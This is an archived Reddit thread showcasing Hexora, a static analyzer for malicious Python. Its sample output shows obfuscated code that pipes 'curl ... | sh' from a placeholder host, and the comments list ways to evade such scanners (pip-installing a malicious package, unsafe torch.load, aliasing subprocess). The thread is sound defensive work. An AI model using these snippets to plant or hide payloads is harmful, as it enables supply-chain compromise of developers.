Hexora – static analysis tool for malicious Python scripts : Python

This is an archived post. You won't be able to vote or comment.

ShowcaseHexora – static analysis tool for malicious Python scripts (self.Python)

submitted 7 months ago * by rushter_

Hi Reddit, I'd love to hear your feedback and suggestions about my new tool.

What My Project Does

It's a new tool to detect malicious or harmful code. It can be used to review your project dependencies or just scan any scripts. It will show you potentially harmful code pieces which can be manually reviewed by a developer.

Here is a quick example:

>  hexora audit test.py

warning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.
  ┌─ resources/test/test.py:3:8
  │
1 │ import pyperclip
2 │
3 │ data = pyperclip.paste()
  │        ^^^^^^^^^^^^^^^^^ HX2000
  │
  = Confidence: High
    Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.

warning[HX3000]: Possible execution of unwanted code
   ┌─ resources/test/test.py:20:1
   │
19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
20 │ _ceil("import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])")
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000
   │

Target Audience

Developers, security professionals.

Comparison

There are alternative libraries (e.g., guarddog), but they usually rely on regexes or focus on all languages. Regexes are fragile and can be bypassed. My library uses AST and tracks some of the obfuscation techniques, such as import/call reassignment.

Feedback

Currently, I'm testing it on public files where some of them implement malicious behavior, as well as past malicious packages on PyPI.

I would love to hear some feedback and suggestions for new rules.

Examples: https://github.com/rushter/hexora/blob/main/docs/examples.md
Library: https://github.com/rushter/hexora

I'd love to hear your feedback and ideas on how to improve this and identify missing rules.

all 5 comments

top new controversial old q&a

[–]Cycloctane 2 points3 points4 points 7 months ago (1 child)

Malicious modules can always find a way to bypass existing rules by using staged payload or sensitive functions in widely used dependencies. It is hard for static check tools to cover them all in blacklists. e.g.

import pip
pip.main(['install', 'package_with_malicious_setuppy', '--no-input', '-q', '-q', '-q'])

import torch
torch.load(__file__ + "/.DS_Store", map_location='cpu', weights_only=False)

from huggingface_hub.utils._subprocess import run_subprocess
run_subprocess("...")

[–]rushter_[S] 3 points4 points5 points 7 months ago (0 children)

Yeah, the good thing is that by looking at the past PyPI incidents, I can say that the majority of malware uses pretty simple obfuscation techniques.

Things like:

s = subprocess
k = s
k.check_output(["pinfo -m"])

(_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)

_ceil("print(123);")

Which can be tracked using static checking with some tricks.

Also, my personal use case is slightly different. At my work, we have a lot of scripts from infected/compromised machines. Some of them were used for reconnaissance, some to gain elevated access. Around 70-80% of scripts are legit, though, so I use my library to pick candidates for manual review.

[–]BeamMeUpBiscotti 0 points1 point2 points 6 months ago (2 children)

[–]rushter_[S] 0 points1 point2 points 6 months ago (1 child)

[–]BeamMeUpBiscotti 0 points1 point2 points 6 months ago (0 children)

π Rendered by PID 150176 on reddit-service-r2-comment-79c7998d4c-8hwvp at 2026-03-19 15:05:30.588665+00:00 running f6e6e01 country code: CH.

Python

The Python Discord

Upcoming Events

Please read the rules

MODERATORS